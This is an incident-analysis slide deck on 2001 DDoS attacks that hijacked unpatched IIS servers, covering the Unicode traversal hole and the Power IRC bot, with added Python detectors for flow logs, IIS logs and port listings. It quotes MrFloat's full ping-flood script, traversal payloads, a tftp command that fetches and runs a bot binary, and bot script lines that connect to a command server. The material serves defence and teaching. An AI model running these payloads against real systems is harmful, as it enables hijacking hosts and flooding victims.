%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%
%deffont "standard" xfont "helvetica-medium-r", tfont "standard.ttf", tmfont "hoso6.ttf"
%deffont "thick" xfont "helvetica-bold-r", tfont "thick.ttf", tmfont "hoso6.ttf"
%deffont "typewriter" xfont "courier-medium-r", tfont "typewriter.ttf", tmfont "hoso6.ttf"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%
%% Default settings per each line numbers.
%%
%default 1 leftfill, size 2, fore "gray20", back "white", font "standard", hgap 0
%default 2 size 7, vgap 10, prefix " ", ccolor "black"
%default 3 size 2, bar "gray70", vgap 10
%default 4 size 5, fore "gray20", vgap 30, prefix " ", font "standard"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%
%% Default settings that are applied to TAB-indented lines.
%%
%tab 1 size 5, vgap 40, prefix " ", icon box "green" 50
%tab 2 size 4, vgap 40, prefix " ", icon arc "yellow" 50
%tab 3 size 3, vgap 40, prefix " ", icon delta3 "white" 40
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%nodefault
%size 6.5, font "standard", back "white", ccolor "black"
%center, fore "Blue", font "standard", hgap 20, size 6.5
Recent Developments in DDoS
%center, fore "Blue", font "standard", hgap 20, size 4.5
Unwitting agents & "Power"
%bar "skyblue" 6 15 70
%font "standard", hgap 0
%size 5, fore "darkblue"
David Dittrich
%size 4.5
dittrich@cac.washington.edu
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Part I: Unwitting agents (patsies)
	Overview
	Examples
		www.whitehouse.gov
		MrFloat
		grc.com
		Power bot
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Part II: Power bot
	Overview of Power
	Network setup
	Signature on victim systems
	Use for distributed scanning
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Unwitting agents (patsies)
	NOT reflectors a la Vern Paxson
	Not necessary to install DDoS agent
		Remote exploit runs arbitrary program
		Uses existing operating system features
			Windows PING.EXE
	Cannot be identified by:
		Remote port scan (e.g., RID)
		File system scanners (e.g., NIPC find_ddos)
		Anti-virus software
	Might be identified by:
		Router flows/network traffic
		Vulnerability scans (e.g., Nessus)
		System logs
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Candidates for unwitting agents
	Some fraction of installed base of ???
	Think sadmind-IIS worm
		Logs found on one worm host:
%font "typewriter", hgap 0, size 3, prefix " "
 % wc -l result.txt
 35170 result.txt
 % grep hacked result.txt | wc -l
 459
%font "standard"
		1.3% of Windows hosts scanned were vulnerable
	Think Code Red
%font "typewriter", size 3, prefix " "
 According to estimates from the [CERT/CC] ... more than
 150,000 systems were infected by Code Red II within
 days of its release.
%font "standard"
		What percentage were vulnerable to Code Red?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
www.whitehouse.gov attack
	Site taken off-line May 4, 2001
	Hundreds of systems worldwide flooding
	C|Net news story
		Reports ICMP flood
		Also claims one ISP identified "DDoS tools" (?)
	12 Windows 2000 systems at the UW involved
		All running Windows NT and 2K
		One admin finds PING.EXE running
			Target: www.whitehouse.gov IP
		AV software finds nothing
	UNISOG email (next page)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
www.whitehouse.gov (cont)
%font "typewriter", hgap 0, size 2, prefix " "
 Date: Fri, 04 May 2001 14:26:29 -0700
 From: Computer Security Officer
 To: unisog@sans.org
 Subject: [unisog] DDoS against www.whitehouse.gov

 The attack exploited vulnerable IIS5 servers on Win2K and WinNT
 systems.  Immediately prior to the attack we see an incoming port 80
 connection from IP address 202.102.14.137 (CHINANET Jiangsu province
 network) to each of the systems that subsequently began pinging
 198.137.240.92.  The argus log looks in part like this.

 Fri 05/04 05:18:21 tcp 202.102.14.137.41406 <-> 128.12.177.11.80 EST
 Fri 05/04 05:18:21 tcp 202.102.14.137.41495 <-> 128.12.157.89.80 EST
 Fri 05/04 05:18:22 F icmp 128.12.157.89 -> 198.137.240.92 ECO
 Fri 05/04 05:18:22 F icmp 128.12.177.11 -> 198.137.240.92 ECO

 Each of the systems reviewed so far had two ping processes running.
 One of the hosts had the following in its IIS log file.

 12:21:36 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200
 12:29:29 202.102.14.137 GET /scripts/../../winnt/system32/ping.exe 200

 While I am surprised that such a simple exploit could work, it looks
 like it may be exactly what happened.  The attack was targeted at less
 than 2% of the total residence network population so it was probably
 mapped out earlier.  ZDNet has a story running that indicated that we
 were not the only one used in this way.

 We are issuing an alert to our dorm network users to update their
 systems with the relevant security patches.  We've been working so
 hard at cleaning up the linux boxes that we've tended to ignore the
 Windows boxes.  Not any more.
 Stephen
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
MrFloat
	Published May 31, 2001 to Packetstorm Security
%font "typewriter", hgap 0, size 2.5, prefix " "
 # DDoS tool written by MrFloat
 #
 # This tool is not written for scriptkiddies ddos'ing around, but it's written for
 # educational purposes: To show how easy it is to make boxes - which are not yours -
 # do distributed ping attacks. Admins should be aware of bugs in their systems and they
 # should keep them up-to-date
 #
 # This tool can be very dangerous when you exploit NT boxes with a lot of bandwidth, so
 # only test it if you REALLY know what you're doing. This tool was tested on my home LAN.
 #
 # Grtz, MrFloat ( mrfloat@dds.nl )
 #
 # -
 # Usage: ./ddos.sh hostname
 #
 # Place vulnerable hosts in the bcasts file
 #
 echo .:: Phreak.nl ::. NT DDoS tool - Written by MrFloat
 for i in `cat bcasts`; do
 echo Sending flood request to $i;
 lynx -dump http://$i/scripts/georgi.bat/..\%C1\%9C..\%C1\%9C..\%C1\%9Cwinnt/system32/cmd.exe\?/c\+ping+-n+65000+-l+64000+-w+5+$1 &
 done
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
grc.com attack
	Site taken off-line in June 2001
		Large packet (fragmented) ICMP flood
	Brian McWilliams does story
	Steve's analysis at:
%font "typewriter", hgap 0, size 3, prefix " "
 http://grc.com/dos/attacklog.htm
%font "standard"
	Flooding from 195 systems
		All running Windows NT
	IIS logs show initial probe for:
%font "typewriter", hgap 0, size 3, prefix " "
 GET /scripts/..%c1%9c..%c1%9ccwinnt/system32/cmd.exe?/c+dir+c:\
%font "standard"
	Vulnerable systems later show execution of:
%font "typewriter", hgap 0, size 3, prefix " "
 ping.exe -n 9999999 -l 65500 -w 0
%font "standard"
	Even "no raw sockets" wouldn't have saved him
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
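The UNISOG mail above identifies the patsies from router flows alone: an inbound port 80 connection from one outside client, followed a second later by ICMP echo requests from that same campus host toward the victim. The following is an added example, not part of the deck or the mail, that turns that observation into a check over argus-style flow lines. It assumes the "ra" line layout shown in the mail; the monitored prefix (192.0.2.0/24) and all addresses in the sample are constructed.

```python
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed prefix standing in for the campus network being monitored.
LOCAL_NETS = [ip_network("192.0.2.0/24")]

# argus "ra" style lines as quoted in the UNISOG mail, e.g.
#   Fri 05/04 05:18:21 tcp 202.102.14.137.41406 <-> 128.12.177.11.80 EST
#   Fri 05/04 05:18:22 F icmp 128.12.157.89 -> 198.137.240.92 ECO
FLOW = re.compile(
    r"^\w{3} (?P<date>\d\d/\d\d) (?P<time>\d\d:\d\d:\d\d)\s+(?:F\s+)?"
    r"(?P<proto>tcp|udp|icmp)\s+(?P<src>\S+)\s+(?:<->|->)\s+(?P<dst>\S+)\s+(?P<state>\S+)$"
)

def split_addr(token):
    """'128.12.177.11.80' -> (ip, 80); a bare ICMP address -> (ip, None)."""
    if token.count(".") == 4:
        host, port = token.rsplit(".", 1)
        return ip_address(host), int(port)
    return ip_address(token), None

def is_local(ip):
    return any(ip in net for net in LOCAL_NETS)

def parse_flows(lines, year=2001):
    """Parse the flow lines into dicts; argus lines carry no year, so it is supplied."""
    flows = []
    for line in lines:
        m = FLOW.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['date']} {m['time']}", "%Y %m/%d %H:%M:%S")
        src, sport = split_addr(m["src"])
        dst, dport = split_addr(m["dst"])
        flows.append({"when": when, "proto": m["proto"], "src": src, "sport": sport,
                      "dst": dst, "dport": dport, "state": m["state"]})
    return flows

def find_patsies(lines, window_seconds=60):
    """Flag local hosts that accept an inbound web connection from outside and,
    within the window, begin sending ICMP echo requests to some third host."""
    flows = parse_flows(lines)
    inbound_web = {}  # local host -> [(time, outside client), ...]
    for f in flows:
        if f["proto"] == "tcp" and f["dport"] == 80 and is_local(f["dst"]) and not is_local(f["src"]):
            inbound_web.setdefault(f["dst"], []).append((f["when"], f["src"]))
    findings = []
    for f in flows:
        if f["proto"] != "icmp" or f["state"] != "ECO" or not is_local(f["src"]) or is_local(f["dst"]):
            continue
        for when, client in inbound_web.get(f["src"], []):
            delay = (f["when"] - when).total_seconds()
            if 0 <= delay <= window_seconds:
                findings.append({"agent": str(f["src"]), "controller": str(client),
                                 "target": str(f["dst"]), "delay_s": delay})
                break
    return findings

# Constructed sample: two patsies, one ordinary user pinging a site they browsed
# (no inbound web connection first), and one echo far outside the window.
SAMPLE_ARGUS = [
    "Fri 05/04 05:18:21 tcp 203.0.113.7.41406 <-> 192.0.2.11.80 EST",
    "Fri 05/04 05:18:21 tcp 203.0.113.7.41495 <-> 192.0.2.89.80 EST",
    "Fri 05/04 05:18:22 F icmp 192.0.2.89 -> 198.51.100.10 ECO",
    "Fri 05/04 05:18:22 F icmp 192.0.2.11 -> 198.51.100.10 ECO",
    "Fri 05/04 05:19:40 tcp 192.0.2.23.1044 <-> 203.0.113.40.80 EST",
    "Fri 05/04 05:19:41 F icmp 192.0.2.23 -> 203.0.113.40 ECO",
    "Fri 05/04 06:10:00 tcp 203.0.113.7.42000 <-> 192.0.2.50.80 EST",
    "Fri 05/04 06:40:00 F icmp 192.0.2.50 -> 198.51.100.10 ECO",
]

if __name__ == "__main__":
    for hit in find_patsies(SAMPLE_ARGUS):
        print(f"{hit['agent']} pinged {hit['target']} {hit['delay_s']:.0f}s after "
              f"a web connection from {hit['controller']}")
```

The window is deliberately short because the deck's point is that nothing is installed: the flood starts the moment the exploit request lands, so the inbound connection and the first echo request sit within seconds of each other in the flow record, while a ping.exe that a user started on their own has no such preceding inbound connection.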
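The other place these patsies show up is the IIS log: every case on these slides (the ping.exe fetches in the UNISOG mail, MrFloat's request, the grc.com probe, and the Power bot scanning and tftp bootstrap lines on the slides that follow) is a request that walks out of /scripts into winnt/system32. What makes them easy to miss is that the same path can be written as ../.., as ..\.., or as ..%c1%9c.. (an overlong UTF-8 encoding of the backslash that the vulnerable IIS decoder accepted after its traversal check had run). The following is an added example, not from the deck, that normalizes all three spellings before matching; the log layout ("date time client method uri status") and every sample line are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Programs the deck shows being reached through the traversal hole:
# cmd.exe /c+dir (probe), ping.exe (whitehouse.gov, grc.com, MrFloat),
# tftp.exe (Power bot bootstrap).
SUSPECT_BINARIES = ("cmd.exe", "ping.exe", "tftp.exe")

def decode_overlong_utf8(data: bytes) -> str:
    """Decode bytes the way the vulnerable IIS decoder did: a two-byte sequence
    starting C0 or C1 is accepted as the 7-bit character it overlong-encodes
    (%c1%9c -> '\\', %c0%af -> '/'). Other bytes are kept as Latin-1."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def normalize_uri(raw: str) -> str:
    """Percent-decode, fold overlong sequences, unify separators, lower-case,
    so '..%c1%9c..', '..\\..' and '../..' all compare equal."""
    return decode_overlong_utf8(unquote_to_bytes(raw)).replace("\\", "/").lower()

def classify_request(raw_uri: str):
    """Describe a request that traverses into winnt/system32 and names a
    suspect program; return None for anything else."""
    path, _, query = normalize_uri(raw_uri).partition("?")
    if "/../" not in path or "winnt/system32/" not in path:
        return None
    binary = path.rsplit("/", 1)[-1]
    if binary not in SUSPECT_BINARIES:
        return None
    command = query.replace("+", " ").strip()
    launched = binary
    parts = command.split()
    if binary == "cmd.exe" and len(parts) >= 2 and parts[0] == "/c":
        launched = parts[1]  # cmd.exe /c <program>: the program is what really ran
    return {"binary": binary, "launched": launched, "command": command}

# Constructed simplified layout: "date time client method uri status".
LOG_LINE = re.compile(r"^(?P<time>\S+ \S+) (?P<client>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<status>\d+)$")

def scan_log(lines):
    """Return one finding per log line that launched a program via traversal."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = classify_request(m["uri"])
        if hit:
            hit.update(time=m["time"], client=m["client"], status=int(m["status"]))
            findings.append(hit)
    return findings

SAMPLE_LOG = [  # constructed lines; addresses are documentation ranges
    "2001-07-01 00:04:43 198.51.100.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 200",
    "2001-07-01 00:05:10 198.51.100.9 GET /scripts/..\\../winnt/system32/cmd.exe?/c+tftp.exe+-i+198.51.100.9+GET+nt.exe 200",
    "2001-05-04 12:21:36 198.51.100.9 GET /scripts/../../winnt/system32/ping.exe 200",
    "2001-05-04 12:22:01 203.0.113.5 GET /scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+ping+-n+65000+-l+64000+-w+5+192.0.2.1 200",
    "2001-05-04 12:22:05 203.0.113.5 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\ 200",
    "2001-05-04 12:23:00 192.0.2.44 GET /index.htm 200",
    "2001-05-04 12:23:30 192.0.2.44 GET /scripts/upload.asp?file=..%2f..%2fetc 404",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} ran {f['launched']} via {f['binary']}: {f['command']}")
```

Matching on the normalized path rather than on the literal "%c1%9c" is the point: a signature for one encoding misses the others, and a signature on the client address misses the next controller. The last two sample lines show that ordinary requests, including a dot-dot inside a query string, do not fire.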
%%pcache 1 1 0 30
Power bot
	Found at UW in July 2001
	Involved over 100 systems total
		All Windows 2000 and NT
	Multiple DDoS attacks to multiple targets
		UDP floods
		ICMP floods
	Hundreds of reports of scanning
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Overview of Power
	Runs on Windows NT/2K systems
		Takes advantage of remotely exploitable IIS
		Bootstraps itself using tftp
		Uses same hole for DDoS attacks
	Based on mIRC client
		Scripts provide commands
		Auxiliary program (hexplore.exe) hides mIRC client window
	Major features
		IRC command/control
		Distributed DoS
		Distributed scanning
		Distributed BNC
		Automated update
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Network setup - scanning
%font "standard"
	Exploits IIS Unicode hole
%font "typewriter", hgap 0, size 3, prefix " "
 http://www.cert.org/advisories/CA-2001-11.html
%font "typewriter", hgap 0, size 3, prefix " "
 [07/01/2001 00:04:43.602 GMT-0700] Connection: 1CustXXX.XXXX.XXXXXX.XX.da.uu.net (63.XX.XXX.XXX) on port 80 (tcp).
 [07/01/2001 00:04:43.922 GMT-0700] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Network setup - exploit
	After finding vulnerable IIS servers, bootstrap Power
%font "typewriter", hgap 0, size 3, prefix " "
 2001-07-02 21:39:14 10.0.0.3 - 192.168.1.2 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+10.0.0.3+GET+nt.exe
%font "standard"
	Run nt.exe
		Opens listening port 12624/tcp
		Later updates sent to 4836/tcp
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Network setup - installation
	nt.exe loads:
		winnt.exe - mirc32.exe binary
		mirc.ini - mirc32 config file
		hexplore.exe - Hides client windows
		remote.ini - Configuration file for bot
		wins.ava - Code for BNC/Scan/DDoS program
		win98.ava - Code for BNC/Scan/DDoS program
	These files have been found in one or more of:
%font "typewriter"
 C:\Inetpub\scripts
 C:\
 C:\i386
%font "standard"
	Self-encryption/compression used
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Signature on victim systems
	Output of "nmap" scan
%font "typewriter", hgap 0, size 3, prefix " "
 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
 Interesting ports on athena.chem.washington.edu (128.95.64.225):
 (The 65522 ports scanned but not shown below are in state: closed)
 Port       State       Service
 21/tcp     open        ftp
 23/tcp     open        telnet
 25/tcp     open        smtp
 80/tcp     open        http
 100/tcp    open        newacct
 135/tcp    open        loc-srv
 139/tcp    open        netbios-ssn
 443/tcp    open        https
 445/tcp    open        microsoft-ds
 1025/tcp   open        listen
 1026/tcp   open        nterm
 4836/tcp   open        unknown
 12624/tcp  open        unknown

 TCP Sequence Prediction: Class=random positive increments
                          Difficulty=17052 (Worthy challenge)
 Remote operating system guess: Windows 2000 RC1 through final release
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Connection to 12624/tcp
%font "typewriter", hgap 0, size 3, prefix " "
 % telnet host.victim.edu 12624
 Trying 192.168.1.225...
 Connected to host.victim.edu
 Escape character is '^]'.
%font "typewriter", hgap 0, size 3, prefix " ", fore "Red"
 Password:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Process list
%font "typewriter", hgap 0, size 2.5, prefix " ", fore "black"
 FPort v1.33 - TCP/IP Process to Port Mapper
 Copyright 2000 by Foundstone, Inc.
 http://www.foundstone.com

 Pid   Process            Port  Proto Path
 884   inetinfo       ->  21    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
 884   inetinfo       ->  25    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
 884   inetinfo       ->  80    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
%fore "red"
 1400  winnt          ->  100   TCP   C:\winnt.exe
%fore "black"
 444   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
 884   inetinfo       ->  443   TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
%fore "red"
 1400  winnt          ->  2350  TCP   C:\winnt.exe
 1400  winnt          ->  2351  TCP   C:\winnt.exe
 1400  winnt          ->  2352  TCP   C:\winnt.exe
 [hundreds of lines removed . . .]
 1400  winnt          ->  2647  TCP   C:\winnt.exe
 1400  winnt          ->  2648  TCP   C:\winnt.exe
%fore "black"
 772   termsrv        ->  3389  TCP   C:\WINNT\System32\termsrv.exe
%fore "red"
 1152  nt             ->  4836  TCP   c:\inetpub\scripts\nt.exe
 1152  nt             ->  12624 TCP   c:\inetpub\scripts\nt.exe
%fore "black"
 444   svchost        ->  135   UDP   C:\WINNT\system32\svchost.exe
 8     System         ->  445   UDP
 220   winlogon       ->  1046  UDP   \??\C:\WINNT\system32\winlogon.exe
 884   inetinfo       ->  1064  UDP   C:\WINNT\System32\inetsrv\inetinfo.exe
 884   inetinfo       ->  3456  UDP   C:\WINNT\System32\inetsrv\inetinfo.exe
%fore "red"
 1152  nt             ->  12623 UDP   c:\inetpub\scripts\nt.exe
%fore "black"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Automated upload
%size 2.5, font "typewriter", prefix " "
 T 2001/06/06 00:38:34.043659 10.10.10.10:3210 -> 192.168.1.1:12624 [AP]
   bowler..
 T 2001/06/06 00:38:35.567124 10.10.10.10:3210 -> 192.168.1.1:12624 [AP]
   *?!?PL.
 T 2001/06/06 00:38:38.827927 10.10.10.10:3210 -> 192.168.1.1:12624 [AP]
   *?!?CM001B0110.2.
 T 2001/06/06 00:38:48.360328 10.10.10.10:3211 -> 192.168.1.1:4836 [AP]
   0000004923C:\wins.ava.
 T 2001/06/06 00:38:48.538066 10.10.10.10:3211 -> 192.168.1.1:4836 [A]
   alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{..
   run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m
   ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir
   cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667.. .ti
   merconnect 0 30 connect..write -c webservers.txt..if (%scanning != don
   e) { .http 208.1.1.1 | halt }..}..on 1:connect:{.. timerconnect off..
   join #IIS %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu
   6667.. .timerconnect 0 30 connect..}..on 1:t
   . . .
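The nmap and FPort slides give three host-side signatures of Power: the fixed listener ports (12624/tcp, 4836/tcp, 12623/udp), listeners whose image lives in the web root or the drive root instead of the system directories (c:\inetpub\scripts\nt.exe, C:\winnt.exe), and one process holding hundreds of TCP ports at once (the distributed BNC). The following is an added example, not from the deck or from Foundstone, that applies those three checks to FPort output. It assumes the column layout shown on the slide; the sample listing is constructed from the slide's rows with a generated run of BNC ports standing in for the lines the slide elides.

```python
import re
from collections import defaultdict

# Listener ports the deck attributes to the Power bot's nt.exe.
POWER_PORTS = {("TCP", 12624), ("TCP", 4836), ("UDP", 12623)}
# Where Windows NT/2000 services are normally launched from (lower-case).
SYSTEM_DIRS = ("c:\\winnt\\system32\\",)

# FPort v1.33 row: "Pid   Process   ->  Port  Proto Path"; Path may be absent.
FPORT_LINE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<proc>\S+)\s+->\s+(?P<port>\d+)\s+(?P<proto>TCP|UDP)\s*(?P<path>.*?)\s*$"
)

def parse_fport(text):
    """Turn FPort output into a list of {pid, process, port, proto, path} rows."""
    rows = []
    for line in text.splitlines():
        m = FPORT_LINE.match(line)
        if not m:
            continue
        path = m["path"]
        if path.startswith("\\??\\"):  # NT object-manager prefix, seen on winlogon
            path = path[4:]
        rows.append({"pid": int(m["pid"]), "process": m["proc"], "port": int(m["port"]),
                     "proto": m["proto"], "path": path.lower()})
    return rows

def check_host(text, fanout_threshold=20):
    """Return (pid, path, reason) tuples for rows matching a Power signature."""
    rows = parse_fport(text)
    findings, seen_images = [], set()
    for r in rows:
        if (r["proto"], r["port"]) in POWER_PORTS:
            findings.append((r["pid"], r["path"], f"{r['proto']}/{r['port']} is a known Power bot listener"))
        elif r["path"] and not r["path"].startswith(SYSTEM_DIRS) and (r["pid"], r["path"]) not in seen_images:
            seen_images.add((r["pid"], r["path"]))  # report each odd image once, not per port
            findings.append((r["pid"], r["path"], "listener image outside the Windows system directories"))
    tcp_ports = defaultdict(set)
    for r in rows:
        if r["proto"] == "TCP":
            tcp_ports[(r["pid"], r["path"])].add(r["port"])
    for (pid, path), ports in tcp_ports.items():
        if len(ports) >= fanout_threshold:
            findings.append((pid, path, f"bound to {len(ports)} TCP ports: BNC/proxy fan-out"))
    return findings

# Constructed listing modelled on the slide; the 2350-2379 run stands in for
# the hundreds of winnt.exe rows the slide elides.
SAMPLE_FPORT = """FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
884   inetinfo       ->  80    TCP   C:\\WINNT\\System32\\inetsrv\\inetinfo.exe
1400  winnt          ->  100   TCP   C:\\winnt.exe
444   svchost        ->  135   TCP   C:\\WINNT\\system32\\svchost.exe
772   termsrv        ->  3389  TCP   C:\\WINNT\\System32\\termsrv.exe
1152  nt             ->  4836  TCP   c:\\inetpub\\scripts\\nt.exe
1152  nt             ->  12624 TCP   c:\\inetpub\\scripts\\nt.exe
8     System         ->  445   UDP
220   winlogon       ->  1046  UDP   \\??\\C:\\WINNT\\system32\\winlogon.exe
1152  nt             ->  12623 UDP   c:\\inetpub\\scripts\\nt.exe
""" + "".join(f"1400  winnt          ->  {p:<5} TCP   C:\\winnt.exe\n" for p in range(2350, 2380))

if __name__ == "__main__":
    for pid, path, reason in check_host(SAMPLE_FPORT):
        print(f"pid {pid} {path}: {reason}")
```

The port check is the weakest of the three, since a rebuilt bot can change its ports, whereas a listener launched out of the IIS scripts directory or a single process fanning out over dozens of TCP ports stays anomalous on a web server whatever the port numbers are. The deck's own point still stands: a remote port scan shows only "unknown" on 4836 and 12624, and it takes a process-to-port mapping on the host to tie them to nt.exe.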
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
%%pcache 1 1 0 30
Use for distributed scanning
	Dialog of foo and bar while scanning
%size 3, font "typewriter", prefix " "
 foo: oh damn, its gonna own shitloads
 foo: on start of the script it will erase everything that it has
 foo: then scan over
 foo: they only reboot every few weeks anyways
 foo: and it will take them 24 hours to scan the whole ip range
 foo: !scan status
 Scanner[24]:[SCAN][Status: ][IP: XX.X.XX.108][Port: 80][Found: 319]
 Scanner[208]:[SCAN][Status: ][IP: XXX.X.XXX.86][Port: 80][Found: 320]
 . . .
 foo: almost 1000 and we aren't even close
 foo: we are gonna own more than we thought
 foo: i bet 100thousand

 [11 hours later]

 Scanner[129]: [SCAN][Status: ][IP: XXX.X.XXX.195][Port: 80][Found: 34]
 Scanner[128]: [SCAN][Status: ][IP: XXX.X.XXX.228][Port: 80][Found: 67]
 Scanner[24]: [SCAN][Status: ][IP: XX.XX.XX.42][Port: 80][Found: 3580]
 Scanner[208]: [SCAN][Status: ][IP: XXX.XXX.XXX.156][Port: 80][Found: 3425]
 Scanner[65]: [SCAN][Status: ][IP: XX.XX.XXX.222][Port: 80][Found: 3959]
 bar: cool
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%bgrad 0 0 256 0 0 "skyblue" "white"
FIN
%center, fore "Blue", font "standard", hgap 20, size 8
Questions?